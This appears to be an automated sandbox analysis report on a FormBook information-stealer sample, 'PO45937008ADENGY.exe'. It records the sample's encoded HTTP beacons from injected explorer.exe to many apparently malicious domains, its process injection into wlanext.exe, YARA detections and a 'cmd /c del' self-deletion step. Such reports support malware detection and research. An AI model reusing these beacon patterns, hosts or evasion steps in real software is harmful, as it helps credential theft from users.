                                                                                                    ETag: "606abe1d-113"
                                                                                                    Via: 1.1 google
                                                                                                    Connection: close
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    14 | 192.168.2.4 | 49775 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    Apr 8, 2021 13:32:16.678647041 CEST | 6422 | OUT | GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp HTTP/1.1
                                                                                                    Host: www.softballlyfe.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:32:16.857335091 CEST | 6422 | IN | HTTP/1.1 403 Forbidden
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 08 Apr 2021 11:32:16 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 275
                                                                                                    ETag: "606eb0f1-113"
                                                                                                    Via: 1.1 google
                                                                                                    Connection: close
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    2 | 192.168.2.4 | 49754 | 3.223.115.185 | 80 | C:\Windows\explorer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    Apr 8, 2021 13:31:06.855776072 CEST | 3211 | OUT | GET /mb7q/?yN60IZO0=LCdox3MSFrqgB2UnRRxcW6IJzj2SaKpVJDnxyOZjgJWO5AYJJIYTqL+jJlLhwAlefZ0q&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.hepimizdostuz.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:06.956935883 CEST | 3218 | IN | HTTP/1.1 302 Found
                                                                                                    Cache-Control: private
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Location: https://www.hugedomains.com/domain_profile.cfm?d=hepimizdostuz&e=com
                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                    X-Powered-By: ASP.NET
                                                                                                    Date: Thu, 08 Apr 2021 11:31:01 GMT
                                                                                                    Connection: close
                                                                                                    Content-Length: 189
                                                                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=hepimizdostuz&amp;e=com">here</a>.</h2></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    3 | 192.168.2.4 | 49762 | 52.15.160.167 | 80 | C:\Windows\explorer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    Apr 8, 2021 13:31:12.230396032 CEST | 4993 | OUT | GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=XnfwGhrIr5kaKJKvTcoJuAoUfO0x4eHAt94m/ubvkhYI6FHew8DVehMKtseK8ovgeTRA HTTP/1.1
                                                                                                    Host: www.hnchotels.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:12.342813969 CEST | 4994 | IN | HTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 08 Apr 2021 11:31:12 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 153
                                                                                                    Connection: close
                                                                                                    Server: nginx/1.16.1
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    4 | 192.168.2.4 | 49763 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    Apr 8, 2021 13:31:17.511185884 CEST | 6328 | OUT | GET /mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.bookitstaugustine.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:17.628392935 CEST | 6329 | IN | HTTP/1.1 403 Forbidden
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 08 Apr 2021 11:31:17 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 275
                                                                                                    ETag: "605e0138-113"
                                                                                                    Via: 1.1 google
                                                                                                    Connection: close
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    5 | 192.168.2.4 | 49764 | 81.88.57.70 | 80 | C:\Windows\explorer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    Apr 8, 2021 13:31:22.719681978 CEST | 6353 | OUT | GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=wg6/7HKVKbWyxm3ocgI2qQ4ybtWVQQxygyNCKw3F9tUQ2TQ7UscRDkS2j2ufAGdI66vr HTTP/1.1
                                                                                                    Host: www.beyju.store
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:22.739568949 CEST | 6354 | IN | HTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 08 Apr 2021 11:31:22 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 203
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mb7q/ was not found on this server.</p></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    6 | 192.168.2.4 | 49765 | 154.210.110.99 | 80 | C:\Windows\explorer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    Apr 8, 2021 13:31:28.254085064 CEST | 6354 | OUT | GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.szmsbk.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:28.748999119 CEST6355OUTGET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.szmsbk.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:28.944855928 CEST6355INHTTP/1.1 403 Forbidden
                                                                                                    Server: nginx/1.16.1
                                                                                                    Date: Thu, 08 Apr 2021 11:31:28 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 153
                                                                                                    Connection: close
  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49766 | 166.62.28.107 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:31:34.124258041 CEST | 6356 | OUT | GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr HTTP/1.1
  Host: www.accessibleageing.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Apr 8, 2021 13:31:34.663022041 CEST | 6357 | IN | HTTP/1.1 301 Moved Permanently
  Date: Thu, 08 Apr 2021 11:31:34 GMT
  Server: Apache
  X-Powered-By: PHP/7.3.23
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  X-Redirect-By: WordPress
  Upgrade: h2,h2c
  Connection: Upgrade, close
  Location: http://accessibleageing.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr
  Vary: User-Agent
  Content-Length: 0
  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.4 | 49767 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:31:39.824414015 CEST | 6358 | OUT | GET /mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl HTTP/1.1
  Host: www.theskineditco.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Apr 8, 2021 13:31:39.971322060 CEST | 6359 | IN | HTTP/1.1 400 Bad Request
  Cache-Control: no-cache, must-revalidate
  Content-Length: 77564
  Content-Type: text/html; charset=UTF-8
  Date: Thu, 08 Apr 2021 11:31:39 UTC
  Expires: Thu, 01 Jan 1970 00:00:00 UTC
  Pragma: no-cache
  Server: Squarespace
  X-Contextid: cVw5pN8Z/LwlozLxk
  Connection: close
  Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.4 | 49768 | 85.17.172.1 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:31:50.143712997 CEST | 6394 | OUT | GET /mb7q/?yN60IZO0=icy9hz7ZIr7yHvDFY6JKJS3opDpdp14zNZwv94Uz6fKXYU2e142cjQElnIAagsV1qBmU&1bhta6=SXxhAn0Xl HTTP/1.1
  Host: www.thelandcle.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Apr 8, 2021 13:31:50.181112051 CEST | 6394 | IN | HTTP/1.1 404 Not Found
  Date: Thu, 08 Apr 2021 11:31:49 GMT
  Server: Apache
  Content-Length: 315
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Apr 8, 2021 13:30:05.449109077 CEST | 104.21.56.119 | 443 | 192.168.2.4 | 49727 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Wed Mar 31 02:00:00 CEST 2021 | Thu Mar 31 01:59:59 CEST 2022 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
(same session, intermediate certificate of the chain) | 104.21.56.119 | 443 | 192.168.2.4 | 49727 | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 | |

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 13:30:04
Start date: 08/04/2021
Path: C:\Users\user\Desktop\PO45937008ADENGY.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
Imagebase: 0xac0000
File size: 112640 bytes
MD5 hash: 47EBF3893D8D6DB4ADD1B87AD75495E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 13:30:08
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:30:09
Start date: 08/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:30:09
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout 1
Imagebase: 0xc60000
File size: 26112 bytes
MD5 hash: 121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:30:11
Start date: 08/04/2021
Path: C:\Users\user\Desktop\PO45937008ADENGY.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\PO45937008ADENGY.exe
Imagebase: 0x1f0000
File size: 112640 bytes
MD5 hash: 47EBF3893D8D6DB4ADD1B87AD75495E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 13:30:11
Start date: 08/04/2021
Path: C:\Users\user\Desktop\PO45937008ADENGY.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\PO45937008ADENGY.exe
Imagebase: 0x40000
File size: 112640 bytes
MD5 hash: 47EBF3893D8D6DB4ADD1B87AD75495E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 13:30:12
Start date: 08/04/2021
Path: C:\Users\user\Desktop\PO45937008ADENGY.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\PO45937008ADENGY.exe
Imagebase: 0x8d0000
File size: 112640 bytes
MD5 hash: 47EBF3893D8D6DB4ADD1B87AD75495E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                                                    General

                                                                                                    Start time:13:30:15
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:
                                                                                                    Imagebase:0x7ff6fee60000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:13:30:14
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152
                                                                                                    Imagebase:0x1220000
                                                                                                    File size:434592 bytes
                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:13:30:32
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                    Imagebase:0xe50000
                                                                                                    File size:78848 bytes
                                                                                                    MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    Reputation:moderate

                                                                                                    General

                                                                                                    Start time:13:30:37
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:/c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
                                                                                                    Imagebase:0x11d0000
                                                                                                    File size:232960 bytes
                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:13:30:37
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff724c50000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Disassembly

                                                                                                    Code Analysis
